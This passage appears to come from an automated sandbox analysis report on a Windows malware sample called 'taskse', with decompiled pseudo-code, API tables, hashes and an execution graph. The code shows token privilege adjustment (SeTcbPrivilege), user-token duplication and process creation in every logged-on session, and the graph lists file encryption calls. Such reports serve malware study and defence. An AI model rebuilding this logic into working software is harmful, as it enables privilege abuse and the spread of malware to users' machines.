																			_v216 = "winsta0\\default";
																			_v176 = _a12;
																			_push(1);
																			_push(_v120);
																			_push( &_v116);
																			if(_v124() == 0) {
																				goto L37;
																			} else {
																				_push( &_v48);
																				_push( &_v224);
																				_push(0);
																				_push(_v116);
																				_push(0x400);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(_a4);
																				_push(_v120);
																				if(_v88() == 0) {
																					goto L37;
																				} else {
																					if(_a16 != 0) {
																						WaitForSingleObject(_v48, 0xffffffff);
																					}
																					_v8 = 0xffffffff;
																					E00401398(0);
																					 *[fs:0x0] = _v20;
																					return 0;
																				}
																			}
																		} else {
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L38;
																		}
																	} else {
																		_push(0xffffffff);
																		_push( &_v20);
																		goto L38;
																	}
																} else {
																	_push(_t107);
																	_push( &_v20);
																	L00401546();
																	 *[fs:0x0] = _v20;
																	return 0;
																}
															}
														} else {
															_push(0xffffffff);
															_push( &_v20);
															goto L38;
														}
													} else {
														_push(0xffffffff);
														_push( &_v20);
														L38:
														L00401546();
														goto L39;
													}
												}
											}
										} else {
											_t94 = LoadLibraryA("wtsapi32.dll");
											if(_t94 == 0) {
												goto L39;
											} else {
												goto L18;
											}
										}
									}
								} else {
									_t94 = LoadLibraryA("userenv.dll"); // executed
									_t161 = _t94;
									if(_t161 == 0) {
										goto L39;
									} else {
										goto L14;
									}
								}
							}
						} else {
							_t94 = LoadLibraryA("kernel32.dll");
							_t160 = _t94;
							if(_t160 == 0) {
								goto L39;
							} else {
								goto L9;
							}
						}
					}
				} else {
					_t94 = LoadLibraryA("advapi32.dll"); // executed
					_t158 = _t94;
					if(_t158 == 0) {
						L39:
						 *[fs:0x0] = _v20;
						return _t94 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















































                                                      0x00401003
                                                      0x00401005
                                                      0x0040100a
                                                      0x00401015
                                                      0x00401016
                                                      0x0040101d
                                                      0x00401028
                                                      0x0040102b
                                                      0x00401030
                                                      0x00401033
                                                      0x00401036
                                                      0x00401039
                                                      0x0040103f
                                                      0x00401042
                                                      0x00401045
                                                      0x0040104a
                                                      0x0040104d
                                                      0x00401050
                                                      0x0040105e
                                                      0x00401062
                                                      0x00401079
                                                      0x00401087
                                                      0x00401092
                                                      0x004010a0
                                                      0x004010ab
                                                      0x004010b4
                                                      0x004010b6
                                                      0x004010bc
                                                      0x00000000
                                                      0x004010e8
                                                      0x004010f3
                                                      0x004010f7
                                                      0x0040110e
                                                      0x00401116
                                                      0x00401121
                                                      0x0040112a
                                                      0x0040112c
                                                      0x00401132
                                                      0x00000000
                                                      0x00401149
                                                      0x00401154
                                                      0x00401158
                                                      0x0040116f
                                                      0x00401177
                                                      0x00401180
                                                      0x00401182
                                                      0x00401188
                                                      0x00000000
                                                      0x00401196
                                                      0x0040119b
                                                      0x004011a3
                                                      0x004011b8
                                                      0x004011be
                                                      0x004011c0
                                                      0x004011c4
                                                      0x00000000
                                                      0x004011ca
                                                      0x004011ca
                                                      0x004011d6
                                                      0x004011dc
                                                      0x004013f7
                                                      0x004013f7
                                                      0x004013f9
                                                      0x004013fc
                                                      0x00000000
                                                      0x004011e2
                                                      0x004011ef
                                                      0x004011f7
                                                      0x00401204
                                                      0x0040120c
                                                      0x00401212
                                                      0x00401218
                                                      0x0040121e
                                                      0x0040122e
                                                      0x0040123a
                                                      0x00401240
                                                      0x00401263
                                                      0x00401268
                                                      0x00401275
                                                      0x0040127b
                                                      0x004012ab
                                                      0x00000000
                                                      0x0040127d
                                                      0x0040127d
                                                      0x00401280
                                                      0x00401289
                                                      0x004012b1
                                                      0x004012b9
                                                      0x004012bd
                                                      0x004012df
                                                      0x004012e4
                                                      0x004012f1
                                                      0x00401304
                                                      0x00401304
                                                      0x00401306
                                                      0x00401310
                                                      0x0040131e
                                                      0x00401325
                                                      0x0040132a
                                                      0x0040132e
                                                      0x00401334
                                                      0x00000000
                                                      0x0040133a
                                                      0x0040133d
                                                      0x00401344
                                                      0x00401345
                                                      0x00401349
                                                      0x0040134a
                                                      0x0040134f
                                                      0x00401350
                                                      0x00401351
                                                      0x00401352
                                                      0x00401356
                                                      0x0040135a
                                                      0x00401360
                                                      0x00000000
                                                      0x00401366
                                                      0x00401369
                                                      0x00401371
                                                      0x00401371
                                                      0x00401377
                                                      0x0040137e
                                                      0x00401388
                                                      0x00401395
                                                      0x00401395
                                                      0x00401360
                                                      0x004012e6
                                                      0x004012e6
                                                      0x004012eb
                                                      0x00000000
                                                      0x004012eb
                                                      0x004012bf
                                                      0x004012bf
                                                      0x004012c4
                                                      0x00000000
                                                      0x004012c4
                                                      0x0040128b
                                                      0x0040128b
                                                      0x0040128f
                                                      0x00401290
                                                      0x0040129d
                                                      0x004012aa
                                                      0x004012aa
                                                      0x00401289
                                                      0x0040126a
                                                      0x0040126a
                                                      0x0040126f
                                                      0x00000000
                                                      0x0040126f
                                                      0x004011f9
                                                      0x004011f9
                                                      0x004011fe
                                                      0x004013fd
                                                      0x004013fd
                                                      0x00000000
                                                      0x00401402
                                                      0x004011f7
                                                      0x004011dc
                                                      0x004011a5
                                                      0x004011aa
                                                      0x004011b2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004011b2
                                                      0x004011a3
                                                      0x0040115a
                                                      0x0040115f
                                                      0x00401165
                                                      0x00401169
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401169
                                                      0x00401158
                                                      0x004010f9
                                                      0x004010fe
                                                      0x00401104
                                                      0x00401108
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401108
                                                      0x004010f7
                                                      0x00401064
                                                      0x00401069
                                                      0x0040106f
                                                      0x00401073
                                                      0x00401405
                                                      0x0040140b
                                                      0x00401418
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401073

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,?), ref: 00401058
                                                      • LoadLibraryA.KERNELBASE(advapi32.dll), ref: 00401069
                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401085
                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 00401090
                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040109E
                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004010A9
                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004010B4
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004010ED
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004010FE
                                                      • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 00401114
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0040111F
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 0040112A
                                                      • GetModuleHandleA.KERNEL32(userenv.dll), ref: 0040114E
                                                      • LoadLibraryA.KERNELBASE(userenv.dll), ref: 0040115F
                                                      • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00401175
                                                      • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00401180
                                                      • GetModuleHandleA.KERNEL32(wtsapi32.dll), ref: 0040119B
                                                      • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 004011AA
                                                      • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 004011BE
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 004011EF
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00401263
                                                      • _local_unwind2.MSVCRT ref: 004013FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule$AdjustLookupPrivilegePrivilegesTokenValue_local_unwind2
                                                      • String ID: AdjustTokenPrivileges$CloseHandle$CreateEnvironmentBlock$CreateProcessAsUserA$DestroyEnvironmentBlock$DuplicateTokenEx$GetCurrentProcess$LookupPrivilegeValueA$OpenProcessToken$SeTcbPrivilege$WTSGetActiveConsoleSessionId$WTSQueryUserToken$advapi32.dll$kernel32.dll$userenv.dll$wtsapi32.dll
                                                      • API String ID: 991275522-4095908470
                                                      • Opcode ID: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                                      • Instruction ID: a8daa8c7751dfcdc06dbaee4ace7374b5f05fd79cd89a88388c8f82615ea9d1e
                                                      • Opcode Fuzzy Hash: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                                      • Instruction Fuzzy Hash: 07A13E71D002599BDB20DFA58C84BAEBBB8FB48711F10467FE519B72D0E77449418F58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401398 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 89 401398-40139d 90 4013a7 89->90 91 40139f-4013a5 89->91 92 4013aa-4013af 90->92 91->92 94 4013b1 92->94 95 4013b4-4013b9 92->95 94->95 96 4013c2-4013c7 95->96 97 4013bb-4013bf 95->97 98 4013c9 96->98 99 4013cc-4013d4 96->99 97->96 98->99 100 4013d6 99->100 101 4013d9-4013de 99->101 100->101 103 4013e0-4013f3 AdjustTokenPrivileges 101->103 104 4013f6 101->104 103->104
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,00401383), ref: 004013EA
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AdjustPrivilegesToken
                                                      • String ID:
                                                      • API String ID: 2874748243-0
                                                      • Opcode ID: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                                      • Instruction ID: c5c4706423aeddcfda8965a2f2378707b10bac3de658310f62e01f4fd8324524
                                                      • Opcode Fuzzy Hash: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                                      • Instruction Fuzzy Hash: 970146B5E10259ABDF10DAE8DCC49AEBBBDAB08304F54482AF905F7650C7789C848B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040154C Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x402070);
				_push(0x401540);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x4031b4 =  *0x4031b4 | 0xffffffff;
				 *0x4031b8 =  *0x4031b8 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x4031b0; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x4031ac; // 0x0
				 *_t24 = _t47;
				 *0x4031bc = _adjust_fdiv;
				_t27 = E004016CB( *_adjust_fdiv);
				_t61 =  *0x4031a0; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004016C8);
				}
				E004016B6(_t27);
				_push(0x40300c);
				_push(0x403008);
				L004016B0();
				_t29 =  *0x4031a8; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4031a4,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L004016B0();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00401510(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004016AA();
				return _t41;
			}





























                                                      0x0040154f
                                                      0x00401551
                                                      0x00401556
                                                      0x00401561
                                                      0x00401562
                                                      0x0040156f
                                                      0x00401574
                                                      0x00401579
                                                      0x00401580
                                                      0x00401587
                                                      0x0040158e
                                                      0x00401594
                                                      0x0040159a
                                                      0x0040159c
                                                      0x004015a2
                                                      0x004015a8
                                                      0x004015b1
                                                      0x004015b6
                                                      0x004015bb
                                                      0x004015c1
                                                      0x004015c8
                                                      0x004015ce
                                                      0x004015cf
                                                      0x004015d4
                                                      0x004015d9
                                                      0x004015de
                                                      0x004015e3
                                                      0x004015e8
                                                      0x00401601
                                                      0x00401607
                                                      0x0040160c
                                                      0x00401611
                                                      0x0040161e
                                                      0x00401620
                                                      0x00401626
                                                      0x00401662
                                                      0x00401667
                                                      0x00401668
                                                      0x00401668
                                                      0x00401628
                                                      0x00401628
                                                      0x00401628
                                                      0x00401629
                                                      0x0040162c
                                                      0x0040162e
                                                      0x00401639
                                                      0x0040163b
                                                      0x0040163b
                                                      0x0040163c
                                                      0x0040163c
                                                      0x00401639
                                                      0x0040163f
                                                      0x00401643
                                                      0x00000000
                                                      0x00000000
                                                      0x00401649
                                                      0x00401650
                                                      0x0040165a
                                                      0x0040166f
                                                      0x0040165c
                                                      0x0040165c
                                                      0x0040165c
                                                      0x0040167b
                                                      0x00401680
                                                      0x00401684
                                                      0x0040168a
                                                      0x0040168f
                                                      0x00401691
                                                      0x00401694
                                                      0x00401695
                                                      0x00401696
                                                      0x0040169d

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                                      • Instruction ID: 2b2245ead73f1024077fef078df1cc7ef2642006793b2c968f0509b8df6eedd3
                                                      • Opcode Fuzzy Hash: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                                      • Instruction Fuzzy Hash: E4417DB1800344AFD7209FA4DE49AAA7FBCAB09711F24063FF541B72E1C7794941CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401420 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 70 401420-40143c LoadLibraryA 71 401449-40145b GetProcAddress 70->71 72 40143e-401448 70->72 73 401468-401478 GetProcAddress 71->73 74 40145d-401467 71->74 75 401485-4014a1 73->75 76 40147a-401484 73->76 78 4014a3-4014ad 75->78 79 4014ae-4014b6 75->79 80 4014f5-401507 79->80 81 4014b8-4014c2 79->81 82 4014c4-4014db call 401000 81->82 86 4014e1-4014ef Sleep 82->86 87 4014dd 82->87 86->82 88 4014f1 86->88 87->86 88->80
                                                      C-Code - Quality: 64%
                                                      			E00401420() {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t18;
				signed int _t19;
				signed int _t20;
				signed int _t22;
				void* _t27;
				intOrPtr _t34;
				signed int _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				signed int _t41;
				void* _t42;
				void* _t45;

				_t45 =  &_v16;
				_v8 = 0;
				_t18 = LoadLibraryA("Wtsapi32.dll"); // executed
				_t40 = _t18;
				if(_t40 != 0) {
					_t19 = GetProcAddress(_t40, "WTSEnumerateSessionsA");
					_t38 = _t19;
					if(_t38 != 0) {
						_t20 = GetProcAddress(_t40, "WTSFreeMemory");
						_t41 = _t20;
						_v4 = _t41;
						if(_t41 != 0) {
							_v16 = 0;
							_v12 = 0;
							_t22 =  *_t38(0, 0, 1,  &_v16,  &_v12); // executed
							if(_v36 != 0) {
								_t39 = 0;
								if(_v32 > 0) {
									_t34 = _v16;
									_t42 = 0;
									do {
										_t27 = E00401000(_t34,  *((intOrPtr*)(_t42 + _v36)), 5, 0); // executed
										_t45 = _t45 + 0x10;
										if(_t27 == 0) {
											_v28 = _v28 + 1;
										}
										Sleep(0x64); // executed
										_t39 = _t39 + 1;
										_t42 = _t42 + 0xc;
									} while (_t39 < _v32);
									_t41 = _v24;
								}
								 *_t41(_v36);
								return _v32;
							} else {
								return _t22 | 0xffffffff;
							}
						} else {
							return _t20 | 0xffffffff;
						}
					} else {
						return _t19 | 0xffffffff;
					}
				} else {
					return _t18 | 0xffffffff;
				}
			}























                                                      0x00401420
                                                      0x0040142e
                                                      0x00401432
                                                      0x00401438
                                                      0x0040143c
                                                      0x00401455
                                                      0x00401457
                                                      0x0040145b
                                                      0x0040146e
                                                      0x00401470
                                                      0x00401474
                                                      0x00401478
                                                      0x00401493
                                                      0x00401497
                                                      0x0040149b
                                                      0x004014a1
                                                      0x004014b2
                                                      0x004014b6
                                                      0x004014b8
                                                      0x004014c2
                                                      0x004014c4
                                                      0x004014d1
                                                      0x004014d6
                                                      0x004014db
                                                      0x004014dd
                                                      0x004014dd
                                                      0x004014e3
                                                      0x004014e9
                                                      0x004014ea
                                                      0x004014ed
                                                      0x004014f1
                                                      0x004014f1
                                                      0x004014fa
                                                      0x00401507
                                                      0x004014a6
                                                      0x004014ad
                                                      0x004014ad
                                                      0x0040147d
                                                      0x00401484
                                                      0x00401484
                                                      0x00401460
                                                      0x00401467
                                                      0x00401467
                                                      0x00401441
                                                      0x00401448
                                                      0x00401448

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(Wtsapi32.dll,?,?,?,00000000,00401531,?,?,0000000A), ref: 00401432
                                                      • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsA), ref: 00401455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: WTSEnumerateSessionsA$WTSFreeMemory$Wtsapi32.dll
                                                      • API String ID: 2574300362-1631035820
                                                      • Opcode ID: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                                      • Instruction ID: 0fb0fd342c264c5c44d83e9ea296aa1d61a1bba0d9bf3c2d8dd8de9c1a89c2df
                                                      • Opcode Fuzzy Hash: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                                      • Instruction Fuzzy Hash: C9210E326043155BC210EF2DEC8096FB3D4EBC4771F910A3FFD64A72D0D639994546A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:12.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1584
                                                      Total number of Limit Nodes:44
                                                      execution_graph 4642 401140 #4710 SendMessageA SendMessageA #537 4647 401970 #3092 #6199 #800 4642->4647 4644 401199 SetTimer 4645 4011c3 CreateThread 4644->4645 4646 4011dd 4644->4646 4645->4646 4648 4012d0 4645->4648 4647->4644 4651 4012e0 sprintf sprintf GetFileAttributesA 4648->4651 4652 4013b0 fopen 4651->4652 4653 401350 4651->4653 4655 4012d9 4652->4655 4656 4013ef fread fclose sprintf fopen 4652->4656 4675 404640 InitializeCriticalSection 4653->4675 4656->4655 4658 401471 fread fclose sprintf fopen 4656->4658 4657 401359 4676 4047c0 4657->4676 4658->4655 4659 4014f2 fread fclose 4658->4659 4674 40be90 strncpy strncpy strncpy 4659->4674 4662 401377 4664 401395 DeleteFileA 4662->4664 4665 40137b 4662->4665 4663 401525 4693 40c240 4663->4693 4692 404690 DeleteCriticalSection 4664->4692 4736 404690 DeleteCriticalSection 4665->4736 4669 401575 4669->4655 4735 404640 InitializeCriticalSection 4669->4735 4671 40158c 4672 4047c0 16 API calls 4671->4672 4673 4015ae 4672->4673 4673->4665 4674->4663 4675->4657 4737 4046b0 4676->4737 4678 4048f3 4678->4662 4679 40484e 4679->4678 4742 4049b0 CreateFileA 4679->4742 4681 40486e 4682 4048e5 _local_unwind2 4681->4682 4684 4049b0 7 API calls 4681->4684 4682->4678 4685 40488a 4684->4685 4685->4682 4686 404895 CryptEncrypt 4685->4686 4686->4682 4687 404908 CryptDecrypt 4686->4687 4687->4682 4688 404932 strncmp 4687->4688 4689 404984 4688->4689 4690 40495e _local_unwind2 4688->4690 4751 4049a6 4689->4751 4690->4662 4692->4652 4694 40c25f 4693->4694 4761 40bed0 4694->4761 4696 40c29b 4697 40c2a2 4696->4697 4698 40c2c8 4696->4698 4699 40c2bc 4697->4699 4700 40c2ad SendMessageA 4697->4700 4701 40c2e5 4698->4701 4702 40c2d9 SendMessageA 4698->4702 4705 40dbf0 free 4699->4705 4700->4699 4780 40dc00 4701->4780 4702->4701 4708 40c3d8 4705->4708 4706 40dc00 4 API calls 4707 40c313 4706->4707 4789 40dd00 4707->4789 4708->4669 4711 40dd00 4 API calls 4712 40c335 4711->4712 4713 40dc00 4 API calls 4712->4713 4714 40c350 4713->4714 4715 40dc00 4 API calls 4714->4715 4716 40c36b 4715->4716 4717 40dc00 4 API calls 4716->4717 4718 40c37d 4717->4718 4719 40c3e0 4718->4719 4720 40c3a9 4718->4720 4723 40c3f0 4719->4723 4724 40c3e4 SendMessageA 4719->4724 4721 40c3b9 4720->4721 4722 40c3ad SendMessageA 4720->4722 4792 40dbf0 4721->4792 4722->4721 4725 40c419 4723->4725 4726 40c44d 4723->4726 4724->4723 4728 40c429 4725->4728 4729 40c41d SendMessageA 4725->4729 4730 40c49c 4726->4730 4731 40c45e fopen 4726->4731 4734 40dbf0 free 4728->4734 4729->4728 4730->4699 4732 40c4a0 SendMessageA 4730->4732 4731->4730 4733 40c479 fwrite fclose 4731->4733 4732->4699 4733->4730 4734->4708 4735->4671 4736->4655 4738 4046b7 CryptAcquireContextA 4737->4738 4739 4046e0 4738->4739 4740 4046d7 4738->4740 4739->4679 4740->4738 4741 4046dd 4740->4741 4741->4679 4743 404a1b _local_unwind2 4742->4743 4744 404a09 GetFileSize 4742->4744 4743->4681 4744->4743 4745 404a25 4744->4745 4745->4743 4747 404a38 GlobalAlloc 4745->4747 4747->4743 4748 404a49 ReadFile 4747->4748 4748->4743 4749 404a64 CryptImportKey 4748->4749 4749->4743 4750 404a81 _local_unwind2 4749->4750 4750->4681 4754 404770 4751->4754 4755 404788 4754->4755 4756 40477a CryptDestroyKey 4754->4756 4757 40479d 4755->4757 4758 40478f CryptDestroyKey 4755->4758 4756->4755 4759 4047b4 4757->4759 4760 4047a4 CryptReleaseContext 4757->4760 4758->4757 4759->4678 4760->4759 4762 40bef5 4761->4762 4763 40bf0a #823 4761->4763 4762->4763 4764 40bf2e 4763->4764 4765 40bf27 4763->4765 4767 40bf46 4764->4767 4800 40baf0 4764->4800 4796 40d5e0 4765->4796 4767->4696 4770 40bf72 4770->4696 4771 40bf8a GetComputerNameA GetUserNameA 4772 40dc00 4 API calls 4771->4772 4773 40c013 4772->4773 4774 40dd00 4 API calls 4773->4774 4775 40c01f 4774->4775 4776 40dc00 4 API calls 4775->4776 4777 40c038 4776->4777 4778 40dd00 4 API calls 4777->4778 4779 40c047 4778->4779 4779->4696 4781 40dc15 4780->4781 4787 40c2f8 4780->4787 4782 40dc77 4781->4782 4783 40dc49 4781->4783 4781->4787 5069 412aa0 realloc 4782->5069 5068 412a90 malloc 4783->5068 4786 40dc51 4786->4787 4788 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4786->4788 4787->4706 4788->4787 4790 40dc00 4 API calls 4789->4790 4791 40c324 4790->4791 4791->4711 4793 40dd70 4792->4793 4794 40dd8b 4793->4794 5070 412ac0 4793->5070 4794->4708 4797 40d602 4796->4797 4832 40dad0 4797->4832 4835 40ba10 4800->4835 4802 40bdf5 4802->4770 4802->4771 4803 40bb14 4803->4802 4804 40bb42 4803->4804 4841 40ba60 4803->4841 4804->4802 4845 40c8f0 #823 4804->4845 4808 40bc1b strtok 4810 40bc30 4808->4810 4824 40bbb7 4808->4824 4809 40ba60 closesocket 4812 40bc8b 4809->4812 4810->4809 4814 40bcec GetTickCount srand 4810->4814 4813 40bc92 4812->4813 4812->4814 4867 40c860 4813->4867 4816 40bdc7 4814->4816 4817 40bd07 rand 4814->4817 4820 40c860 2 API calls 4816->4820 4821 40bd1e 4817->4821 4819 40bcd8 #825 4819->4802 4823 40bde8 #825 4820->4823 4826 40ba60 closesocket 4821->4826 4829 40be11 4821->4829 4873 40ce50 4821->4873 4823->4802 4824->4808 4825 40c7b0 #825 4824->4825 4847 40c7b0 4824->4847 4851 40c920 4824->4851 4863 40c800 #823 4824->4863 4825->4808 4826->4821 4827 40be75 #825 4827->4802 4829->4827 4879 40c740 4829->4879 4833 40d61e 4832->4833 4834 40dadf setsockopt send shutdown closesocket 4832->4834 4833->4764 4834->4833 4836 40ba27 4835->4836 4837 40ba2b 4836->4837 4838 40ba2c 4836->4838 4837->4803 4884 40b840 sprintf GetFileAttributesA 4838->4884 4840 40ba31 4840->4803 4842 40ba88 4841->4842 5004 40d8c0 4842->5004 4846 40bb62 strtok 4845->4846 4846->4810 4846->4824 4848 40c7d0 4847->4848 4849 40c7bb 4847->4849 4848->4824 4849->4848 4850 40c7d6 #825 4849->4850 4850->4848 4852 40c92d ?_Xlen@std@ 4851->4852 4853 40c932 4851->4853 4852->4853 4854 40c973 4853->4854 4855 40c963 4853->4855 4856 40c946 4853->4856 4860 40c990 4854->4860 4861 40c7b0 #825 4854->4861 4857 40c7b0 #825 4855->4857 4858 40c94a 4856->4858 5008 40c9c0 4856->5008 4859 40c96c 4857->4859 4858->4824 4859->4824 4860->4824 4861->4856 4864 40c81f 4863->4864 5014 40cad0 4864->5014 4866 40c844 4866->4824 4868 40c8d9 4867->4868 4871 40c870 4867->4871 4868->4819 4869 40c8ab #825 4869->4871 4872 40c8cc 4869->4872 4870 